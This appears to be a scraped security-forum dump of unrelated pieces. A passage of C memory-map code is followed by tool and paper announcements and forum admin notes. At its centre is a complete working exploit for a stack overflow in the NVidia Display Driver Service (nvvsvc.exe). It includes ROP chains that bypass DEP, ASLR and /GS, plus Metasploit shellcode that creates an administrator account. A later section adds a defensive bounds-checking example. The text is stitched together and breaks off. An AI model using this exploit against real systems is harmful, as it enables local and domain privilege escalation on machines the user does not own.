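size_t sample_map(struct e820_entry *map, size_t cap)
{
    static const struct e820_entry sample[] = {
        { 0x0,       0x9fc00,   E820_RAM },
        { 0x9fc00,   0x400,     E820_RESERVED },
        { 0xf0000,   0x10000,   E820_RESERVED },
        { 0x100000,  0x7ee0000, E820_RAM },          /* 1MB .. 0x7fe0000 */
        { 0x7fe0000, 0x20000,   E820_RESERVED },
    };
    size_t n = sizeof sample / sizeof sample[0];
    if (cap < n) return 0;
    for (size_t i = 0; i < n; i++) map[i] = sample[i];
    return n;
}

int main(void)
{
    struct e820_entry map[16];
    size_t n = sample_map(map, 16);
    printf("VMX state (constructed regs): %d\n", vmx_state_from_regs(1u << 5, 0x5));
    uint64_t at = reserve_above_1mb(map, &n, 16, 0x100000);
    printf("monitor body reserved at 0x%llx\n", (unsigned long long)at);
    for (size_t i = 0; i < n; i++)
        printf("  base 0x%09llx len 0x%09llx type %u\n", (unsigned long long)map[i].base,
               (unsigned long long)map[i].len, map[i].type);
    return 0;
}
```

With the constructed map the 1MB body lands at 0x200000 (the first 2MB boundary above the first megabyte), and the original RAM entry is split into RAM / RESERVED / RAM so that a later stage reading the same map will not reuse the range.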
-
[h=1]ScanPlanner : NMAP now Online[/h]by Black on December 27, 2012

As we know, most services are moving to the cloud or to software as a service, and ScanPlanner is an example of those sites. We can use NMAP for free for online scanning.

ScanPlanner is the easiest, fastest way to run NMAP scans and tests from the web. Schedule and track your network scans and vulnerability tests with our intuitive online interface. ScanPlanner offers both free and paid services, so we can use it as our needs require. We can schedule regular network scans as frequently as we like and quickly compare results with our scan history. One-pass scans are always free. For the Professional Tools suite, the “pay as you go” plan means paying only for what you need. Plans start as low as $9.95 per month. Graphic, data-rich reports alert you to important changes in your network. The Professional tool suite helps you assess risks and vulnerabilities, as well as suggesting actions.

There are a lot of benefits to using these services, like infrastructure, support, and other operating system dependencies, but there are also risks involved in using these services.

[h=3]Click here to read more or use ScanPlanner[/h]

Source: http://www.pentestit.com/scanplanner-nmap-online/
-
NVidia Display Driver Buffer Overflow
Authored by Peter Winter-Smith

This is an exploit for a stack buffer overflow in the NVidia Display Driver Service. The service listens on a named pipe (\pipe\nsvr) which has a NULL DACL configured, which should mean that any logged on user or remote user in a domain context (Windows firewall/file sharing permitting) should be able to exploit this vulnerability.

/*
NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012 - Bypass DEP + ASLR + /GS + CoE
=============================================================
(@peterwintrsmith)

Hey all! Here is an exploit for an interesting stack buffer overflow in the NVidia Display Driver Service. The service listens on a named pipe (\pipe\nsvr) which has a NULL DACL configured, which should mean that any logged on user or remote user in a domain context (Windows firewall/file sharing permitting) should be able to exploit this vulnerability.

The buffer overflow occurs as a result of a bad memmove operation, with the stack layout effectively looking like this:

[locals] [received-data] [response-buf] [stack cookie] [return address] [arg space] [etc]

The memmove copies data from the received-data buffer into the response-buf buffer, unchecked. It is possible to control the offset from which the copy starts in the received-data buffer by embedding a variable length string - which forms part of the protocol message being crafted - as well as the number of bytes copied into the response buffer.

The amount of data sent back over the named pipe is related to the number of bytes copied rather than the maximum number of bytes that the buffer is able to safely contain, so it is possible to leak stack data by copying from the end of the received-data buffer, through the response-buf buffer (which is zeroed first time round, and second time round contains whatever was in it beforehand), right to the end of the stack frame (including stack cookie and return address).

As the entire block of data copied is sent back, the stack cookie and nvvsvc.exe base can be determined using the aforementioned process. The stack is then trashed, but the function servicing pipe messages won't return until the final message has been received, so it doesn't matter too much.

It is then possible to exploit the bug by sending two further packets of data: One containing the leaked stack cookie and a ROP chain dynamically generated using offsets from the leaked nvvsvc.exe base (which simply fills the response-buf buffer when this data is echoed back) and a second packet which contains enough data to trigger an overwrite if data is copied from the start of the received-data buffer into the response-buf (including the data we primed the latter to contain - stack cookie and ROP chain).

Allowing the function to then return leads to execution of our ROP chain, and our strategically placed Metasploit net user /add shellcode! We get continuation of execution for free because the process spins up a thread to handle each new connection, and there are no deadlocks etc.

I've included two ROP chains, one which works against the nvvsvc.exe running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers from the Dell site, and one which works against the latest version of the drivers for the same card, from:

http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m
http://www.geforce.co.uk/drivers/results/54709

Hope you find this interesting - it's a fun bug to play with!

- Sample Session -

C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
Peter
The command completed successfully.

C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe
 ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
     [@peterwintrsmith]
 - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -
        Usage: nvvsvc_expl.exe <ip>|local

 !! If exploiting remotely, create a session with the target using your domain credentials !!
        Command: net use \\target.ip\ipc$ /u:domain\user password

C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1
 ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
     [@peterwintrsmith]
 - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -

        Action 1 of 9:  - CONNECT

        Action 2 of 9:  - CLIENT => SERVER
                Written 16416 (0x4020) characters to pipe

        Action 3 of 9:  - SERVER => CLIENT
                Read 16504 (0x4078) characters from pipe

        Action 4 of 9: Building exploit ...
                 => Stack cookie 0xe2bad48dd565:
                 => nvvsvc.exe base 0x13f460000:

        Action 5 of 9:  - CLIENT => SERVER
                Written 16416 (0x4020) characters to pipe

        Action 6 of 9:  - SERVER => CLIENT
                Read 16384 (0x4000) characters from pipe

        Action 7 of 9:  - CLIENT => SERVER
                Written 16416 (0x4020) characters to pipe

        Action 8 of 9:  - SERVER => CLIENT
                Read 16896 (0x4200) characters from pipe

        Action 9 of 9:  - DISCONNECT

C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
Peter
r00t
The command completed successfully.
*/

#include <stdio.h>
#include <Windows.h>

enum EProtocolAction
{
    ProtocolAction_Connect = 0,
    ProtocolAction_Receive,
    ProtocolAction_Send,
    ProtocolAction_Disconnect,
    ProtocolAction_ReadCookie,
};

typedef struct
{
    EProtocolAction Action;
    PBYTE Buf;
    DWORD Length;
} ProtocolMessage;

const int GENERIC_BUF_LENGTH = 0x10000;

#define WriteByte(val) {buf[offs] = val; offs += 1;}
#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;}
#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;}
#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;}
#define BufRemaining() (sizeof(buf) - offs)

DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer)
{
    DWORD dwWritten = 0;

    if(WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL))
        return dwWritten;

    return 0;
}

DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE)
{
    DWORD dwRead = 0, dwAvailable = 0;

    if(bTimeout)
    {
        for(DWORD i=0; i < 30; i++)
        {
            if(!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL))
                goto Cleanup;

            if(dwAvailable)
                break;

            Sleep(100);
        }

        if(!dwAvailable)
            goto Cleanup;
    }

    if(!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL))
        goto Cleanup;

Cleanup:
    return dwRead;
}

HANDLE EstablishPipeConnection(char *pszPipe)
{
    HANDLE hPipe = CreateFileA(
        pszPipe,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        0,
        NULL
    );

    if(hPipe == INVALID_HANDLE_VALUE)
    {
        return NULL;
    }

    return hPipe;
}

BYTE *BuildMalicious_LeakStack()
{
    static BYTE buf[0x4020] = {0};
    UINT offs = 0;

    WriteWord(0x52);

    for(UINT i=0; i<0x2000; i++)
        WriteWord(0x41);

    WriteWord(0);

    WriteDword(0);
    WriteDword(0x4078);

    WriteDword(0x41414141);
    WriteDword(0x41414141);
    WriteDword(0x41414141);
    WriteDword(0x41414141);
    WriteDword(0x41414141);

    return buf;
}

BYTE *BuildMalicious_FillBuf()
{
    static BYTE buf[0x4020] = {0};
    UINT offs = 0;

    WriteWord(0x52);
    WriteWord(0); // string

    WriteDword(0);
    WriteDword(0x4000);

    while(BufRemaining())
        WriteDword(0x43434343);

    return buf;
}

BYTE *BuildMalicious_OverwriteStack()
{
    static BYTE buf[0x4020] = {0};
    UINT offs = 0;

    WriteWord(0x52);
    WriteWord(0); // string

    WriteDword(0);
    WriteDword(0x4340); // enough to copy shellcode too

    while(BufRemaining())
        WriteDword(0x42424242);

    return buf;
}

int main(int argc, char* argv[])
{
    DWORD dwReturnCode = 1, dwBytesInOut = 0;
    HANDLE hPipe = NULL;
    static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = {0};

    printf(
        " ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **\n"
        "     [@peterwintrsmith]\n"
        " - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -\n"
    );

    if(argc < 2)
    {
        printf("\tUsage: %s <ip>|local\n\n", argv[0]);
        printf(
            " !! If exploiting remotely, create a session with the target using your domain credentials !!\n"
            "\tCommand: net use \\\\target.ip\\ipc$ /u:domain\\user password\n"
        );
        goto Cleanup;
    }

    memset(rgReadBuf, 0, sizeof(rgReadBuf));

    ProtocolMessage rgConvoMsg[] = {
        {ProtocolAction_Connect, NULL, 0},
        {ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020},
        {ProtocolAction_Receive, {0}, 0x4200},
        {ProtocolAction_ReadCookie, {0}, 0},
        {ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020},
        {ProtocolAction_Receive, {0}, 0x4000},
        {ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020},
        {ProtocolAction_Receive, {0}, 0x4200},
        {ProtocolAction_Disconnect, NULL, 0},
    };

    DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0;
    BOOL bTryAgain = FALSE;

    char szPipe[256] = {0};

    if(stricmp(argv[1], "local") == 0)
        strcpy(szPipe, "\\\\.\\pipe\\nvsr");
    else
        sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]);

    while(i < dwNumberOfMessages)
    {
        printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages);

        switch(rgConvoMsg[i].Action)
        {
            case ProtocolAction_Connect:
                printf(" - CONNECT\n");

                hPipe = EstablishPipeConnection(szPipe);
                if(!hPipe)
                {
                    printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError());
                    goto Cleanup;
                }
                break;

            case ProtocolAction_Disconnect:
                printf(" - DISCONNECT\n");

                CloseHandle(hPipe);
                hPipe = NULL;
                break;

            case ProtocolAction_Send:
                printf(" - CLIENT => SERVER\n");

                if(!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length)))
                {
                    printf("!! Error writing to pipe\n");
                    goto Cleanup;
                }

                printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut);
                break;

            case ProtocolAction_Receive:
                printf("\t - SERVER => CLIENT\n");

                if(!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE)))
                {
                    printf("!! Error reading from pipe (at least, no data on pipe)\n");
                    goto Cleanup;
                }

                printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut);
                break;

            case ProtocolAction_ReadCookie:
                // x64 Metasploit cmd/exec:
                //   "net user r00t r00t00r! /add & net localgroup administrators /add"
                //   exitfunc=thread
                char pb_NetAdd_Admin[] = ""
                    "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
                    "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
                    "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
                    "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
                    "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
                    "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
                    "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
                    "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
                    "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
                    "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
                    "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
                    "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
                    "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
                    "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
                    "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
                    "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
                    "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
                    "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
                    "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30"
                    "\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64"
                    "\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72"
                    "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
                    "\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";

                printf("Building exploit ...\n");

                unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034);
                printf("\t\t => Stack cookie 0x%x%x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie);

                memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8);

                unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL;

                // Perform some limited fingerprinting (my default install version, vs latest at time of testing)
                switch(uiRetnAddress & 0xfff)
                {
                    case 0x640: // 04/11/2011 05:19 1,640,768 nvvsvc.exe [md5=3947ad5d03e6abcce037801162fdb90d]
                    {
                        uiBase = uiRetnAddress - 0x4640;
                        printf("\t\t => nvvsvc.exe base 0x%x%x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);

                        pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8));

                        // Param 1: lpAddress [r11 (near rsp) into rcx]
                        pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn
                        pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
                        pRopChain[2] = 0; // Padding
                        pRopChain[3] = 0; // ...
                        pRopChain[4] = 0; // ...
                        pRopChain[5] = 0; // ...
                        pRopChain[6] = 0; // ...
                        pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
                        pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
                        pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
                        pRopChain[10] = 0; // Padding
                        pRopChain[11] = 0; // ...
                        pRopChain[12] = 0; // ...
                        pRopChain[13] = 0; // ...
                        pRopChain[14] = 0; // ...
                        pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn
                        pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
                        pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
                        // Param 4: lpflOldProtect [r9 - already points at writable location]
                        pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect
                        pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn
                        pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax
                        pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect)

                        memcpy(pRopChain + 22, pb_NetAdd_Admin, sizeof(pb_NetAdd_Admin));
                    }
                    break;

                    case 0xa11: // 01/12/2012 05:49 890,216 nvvsvc.exe [md5=3341d2c91989bc87c3c0baa97c27253b]
                    {
                        uiBase = uiRetnAddress - 0x3a11;
                        printf("\t\t => nvvsvc.exe base 0x%x%x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);

                        pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8));

                        // Param 1: lpAddress [r11 (near rsp) into rcx]
                        pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn
                        pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
                        pRopChain[2] = 0; // Padding ...
                        pRopChain[3] = 0; // ...
                        pRopChain[4] = 0; // ...
                        pRopChain[5] = 0; // ...
                        pRopChain[6] = 0; // ...
                        pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn
                        pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
                        pRopChain[9] = 0; // Padding ...

                        // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
                        pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
                        pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE
                        pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
                        pRopChain[13] = 0; // Padding ...
                        pRopChain[14] = 0; // ...
                        pRopChain[15] = 0; // ...
                        pRopChain[16] = 0; // ...
                        pRopChain[17] = 0; // ...
                        pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
                        // Param 4: lpflOldProtect [r9 - already points at writable location]
                        pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128
                        pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn
                        pRopChain[21] = 0; // Padding ...
                        pRopChain[22] = 0; // ...
                        pRopChain[23] = 0; // ...
                        pRopChain[24] = 0; // ...
                        pRopChain[25] = 0; // ...
                        pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax
                        pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn

                        memcpy(pRopChain + 28, pb_NetAdd_Admin, sizeof(pb_NetAdd_Admin));
                    }
                    break;
                }
                break;
        }

        i++;
    }

    dwReturnCode = 0;

Cleanup:
    if(hPipe)
        CloseHandle(hPipe);

    return dwReturnCode;
}

Source: NVidia Display Driver Buffer Overflow ≈ Packet Storm
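The write-up above pins the root cause to a memmove whose source offset and length both come from the message. The following is an added example, not the exploit's or the driver service's code: a handler over the same kind of message that refuses the two things the post's three packets rely on, copying more than the response buffer holds, and copying past the bytes actually received (the leak primitive). The message layout (WORD command, WORD string terminated by a zero WORD, a DWORD, a DWORD copy length, then payload) is inferred from the packet builders in the exploit and is an assumption; `parse_header`, `echo_checked` and `build_msg` are hypothetical names and the buffers are constructed for the demonstration.

```c
/* Added example: bounded echo handler for the pipe message shape above. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define RESP_BUF_SIZE 0x4000   /* constructed response buffer size */

struct parsed_msg {
    uint16_t command;
    size_t   payload_off;   /* offset of the data that follows the header */
    uint32_t copy_len;      /* client-requested number of bytes to echo back */
};

/* Parse the header without reading past `len`. Returns 0 on malformed input. */
int parse_header(const uint8_t *msg, size_t len, struct parsed_msg *out)
{
    size_t off = 0;
    if (len < 2) return 0;
    memcpy(&out->command, msg, 2); off = 2;
    for (;;) {                           /* skip the WORD string; terminator must be inside */
        uint16_t w;
        if (off + 2 > len) return 0;
        memcpy(&w, msg + off, 2); off += 2;
        if (w == 0) break;
    }
    if (off + 8 > len) return 0;
    off += 4;                            /* DWORD field, not interpreted here */
    memcpy(&out->copy_len, msg + off, 4); off += 4;
    out->payload_off = off;
    return 1;
}

enum echo_result { ECHO_OK, ECHO_MALFORMED, ECHO_LEN_EXCEEDS_RESPONSE, ECHO_LEN_EXCEEDS_RECEIVED };

/* Copy payload into `resp` only when both the destination and the source bound hold.
 * On success *out_len is the number of bytes to send back (never more than copied). */
enum echo_result echo_checked(const uint8_t *msg, size_t len, uint8_t *resp, size_t resp_size,
                              size_t *out_len)
{
    struct parsed_msg hdr;
    if (!parse_header(msg, len, &hdr)) return ECHO_MALFORMED;
    /* Check 1: the unchecked memmove's write side, this is the stack overwrite. */
    if (hdr.copy_len > resp_size) return ECHO_LEN_EXCEEDS_RESPONSE;
    /* Check 2: the read side; a long string pushes payload_off toward the end of the
     * receive buffer, so copy_len must be bounded by what was actually received. */
    if (hdr.copy_len > len - hdr.payload_off) return ECHO_LEN_EXCEEDS_RECEIVED;
    memmove(resp, msg + hdr.payload_off, hdr.copy_len);
    *out_len = hdr.copy_len;
    return ECHO_OK;
}

/* Build a message of the assumed layout (constructed test input). Returns total length, 0 if it does not fit. */
size_t build_msg(uint8_t *buf, size_t cap, uint16_t cmd, size_t str_words, uint32_t copy_len,
                 size_t payload_len)
{
    size_t off = 0, need = 2 + 2 * str_words + 2 + 8 + payload_len;
    if (need > cap) return 0;
    memcpy(buf + off, &cmd, 2); off += 2;
    for (size_t i = 0; i < str_words; i++) { uint16_t w = 0x41; memcpy(buf + off, &w, 2); off += 2; }
    uint16_t z = 0;  memcpy(buf + off, &z, 2); off += 2;
    uint32_t d = 0;  memcpy(buf + off, &d, 4); off += 4;
    memcpy(buf + off, &copy_len, 4); off += 4;
    memset(buf + off, 0x43, payload_len); off += payload_len;
    return off;
}

int main(void)
{
    static uint8_t msg[0x4020], resp[RESP_BUF_SIZE];
    size_t out = 0;
    /* Same shape as the post's first packet: 0x2000-word string, copy length 0x4078. */
    size_t len = build_msg(msg, sizeof msg, 0x52, 0x2000, 0x4078, 20);
    printf("leak-shaped message: result %d\n", echo_checked(msg, len, resp, sizeof resp, &out));
    len = build_msg(msg, sizeof msg, 0x52, 0, 0x100, 0x100);
    printf("well-formed message: result %d, echoed %zu bytes\n",
           echo_checked(msg, len, resp, sizeof resp, &out), out);
    return 0;
}
```

Check 1 alone would still let a client read uninitialised response-buffer contents from a previous message, which is why the second bound, on the bytes received rather than on the buffer's capacity, is the one that closes the information leak.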
-
You also have a chat: https://rstforums.com/chat/ Let me know if there is any problem with it; it was set up in a hurry.
-
Silences Programming Tour with MASM32

Author: Silence
Author website: Silences Programmings Tour - MASM32 (General Edition) - Programming and Coding - Tuts 4 You

In this series I will teach you how to code in MASM32. Everything is very well explained, each line, each word and each API. This tour is called "General Edition" simply because I will teach you general MASM32 programming. In the examples I will teach you how to code anything from a simple messagebox up to an MP3 music player.

Content: (including source)
1. Introduction, Setup & Skeleton of Exe
2. Our first MessageBox
3. Our first DialogBox
4. DialogBox in Detail
5. Default toolbar controls part 1 (RichEdit, Trackbar, Radiobutton & Checkbox)
6. Default toolbar controls part 2 (Progressbar & Tabs)
7. Default toolbar controls part 3 (Listbox)
8. Default DialogBoxes (Color, Font, Open, Save, Print, Page-Setup, Find-Text, Find-Replace)
9. Simple file management
10. Showing Bitmap image & Playing mp3 files
11. Windows Registry + Final words

Filesize: 161.41 MB
Date: Tuesday 25 December 2012 - 07:21:57

Download: http://tuts4you.com/request.php?3430

Source: Silences Programming Tour with MASM32 / Programming / Coding / Downloads - Tuts 4 You
-
Software Testing and Binary Static Analysis [Analysis of computer software, malware]

Author: Ralf Hund, Carsten Willems, Dennis Felsch, Andreas Fobian, Thorsten Holz

A detailed understanding of the behavior of exploits and malicious software is necessary to obtain a comprehensive overview of vulnerabilities in operating systems or client applications, and to develop protection techniques and tools. To this end, a lot of research has been done in the last few years on binary analysis techniques to efficiently and precisely analyze code. Most of the common analysis frameworks are based on software emulators since such tools offer a fine-grained control over the execution of a given program. Naturally, this leads to an arms race where the attackers are constantly searching for new methods and techniques to detect such analysis frameworks in order to successfully evade analysis.

In this paper, we focus on two aspects. As a first contribution, we introduce several novel mechanisms by which an attacker can delude an emulator. In contrast to existing detection approaches that perform a dedicated test on the environment and combine the test with an explicit conditional branch, our detection mechanisms introduce code sequences that have an implicitly different behavior on a native machine when compared to an emulator. Such differences in behavior are caused by the side-effects of the particular operations and imperfections in the emulation process that cannot be mitigated easily. Even powerful analysis techniques such as multi-path execution cannot analyze our detection mechanisms since the emulator itself is deluded.

Motivated by these findings, we introduce a novel approach to generate execution traces. We propose to utilize the processor itself to generate such traces. More precisely, we propose to use a hardware feature called branch tracing available on commodity x86 processors in which the log of all branches taken during code execution is generated directly by the processor. Effectively, the logging is thus performed at the lowest level possible. We present implementation details for both Intel and AMD x86 CPUs and evaluate the practical viability and effectiveness of this approach.

Filesize: 884.68 kB
Date: Tuesday 25 December 2012 - 07:20:43

Download: http://tuts4you.com/request.php?3429

Source: Using Processor Features for Binary Analysis / Software Testing and Binary Static Analysis / Downloads - Tuts 4 You
-
[h=3]Cryptography / Algorithms [ Theory and implementation of cryptographic algorithms... ][/h]

Author: Dima Grigoriev, Vladimir Shpilrain
Description: We employ tropical algebras as platforms for several cryptographic schemes that would be vulnerable to linear algebra attacks were they based on “usual” algebras as platforms.

Download: http://tuts4you.com/request.php?3428

Source: Tropical Cryptography / Cryptography / Algorithms / Downloads - Tuts 4 You
-
[h=3]OllyDbg 2.xx Plugins [ Here you can find most of the plugins ever written for OllyDbg v2.x... ][/h]

Author: Ferrit
Author email: ferrit.rce@gmail.com
Author website: http://forum.tuts4you.com/topic/30532-ollyext/

OllyExt is a plugin for Olly 2.xx debugger. The main intention of this plugin is to provide the biggest anti-anti debugging features and bugfixes for Olly 2.xx. Updates will come...

The currently supported protections are the following:
- IsDebuggerPresent
- NtGlobalFlag
- HeapFlag
- ForceFlag
- CheckRemoteDebuggerPresent
- OutputDebugString
- CloseHandle
- SeDebugPrivilege
- BlockInput
- ProcessDebugFlags
- ProcessDebugObjectHandle
- TerminateProcess
- NtSetInformationThread
- NtQueryObject
- FindWindow
- NtOpenProcess
- Process32First
- Process32Next
- ParentProcess
- GetTickCount
- timeGetTime
- QueryPerformanceCounter
- ZwGetContextThread
- NtSetContextThread
- KdDebuggerNotPresent
- KdDebuggerEnabled
- NtSetDebugFilterState
- ProtectDRX
- HideDRX

The currently supported bugfixes are the following:
- Caption change
- Kill Anti-Attach ( dll integrity check )

Requirements:
- Microsoft Visual C++ 2010 Redistributable Package (x86)

OS support:
- WinXP x32
- WinXP WoW64
- Win7 x32
- Win7 WoW64

Filesize: 46.85 kB
Date: Tuesday 25 December 2012 - 15:16:19

Download: http://tuts4you.com/request.php?3392

Source: OllyExt 1.0 / OllyDbg 2.xx Plugins / Downloads - Tuts 4 You
-
[h=3]Hardware Hacking [ Hacking and/or reverse engineering of custom hardware... ][/h]

Author: Andy Davis
Author email: andy.davis@ngssecure.com
Author website: Security Testing Services & Compliance - NCC Group

Picture this scene, which incidentally happens thousands of times every day all around the world: Someone walks into a meeting room, sees a video cable and plugs it into their laptop. The other end of the cable is out of sight – it just disappears through a hole in the table. What is it connected to? Presumably the video projector bolted to the ceiling, but can it be trusted to just display their PowerPoint presentation?

In this paper I will explain the circumstances in which display devices send data to their connected host and show that this data could potentially contain threats (which could compromise a laptop for example). I will describe video protocol data-structures, data-sequences and practical challenges. I will also explain how to build a hardware-based fuzzer, provide some example firmware fuzzing code, and describe some interesting findings from the fuzzing which has been undertaken so far.

This paper discusses the security of video drivers which interpret and process data supplied to them by external displays, projectors and KVM switches. It covers all the main video standards, including VGA, DVI, HDMI and DisplayPort. This is a relatively new area of research and there is more research that could be performed in this area, so by summarising and sharing these resources, it is hoped that this will enable others to more quickly discover and investigate potential threats.

Filesize: 809.75 kB
Date: Tuesday 25 December 2012 - 15:03:37

Download: http://tuts4you.com/request.php?3422

Source: HDMI – Hacking Displays Made Interesting / Hardware Hacking / Downloads - Tuts 4 You
-
Because of some nasty problems with logging in, I have put back saving the real IPs instead of random(). If you really don't want your IPs saved, you are capable of using Tor or something else yourselves. Maybe at the end of the year, or on the 1st, I will delete all the IPs from the DB again. Maybe we will do this weekly. We'll see.
-
Building A Web Attacker Dashboard With Modsecurity And Beef

Description: Abstract

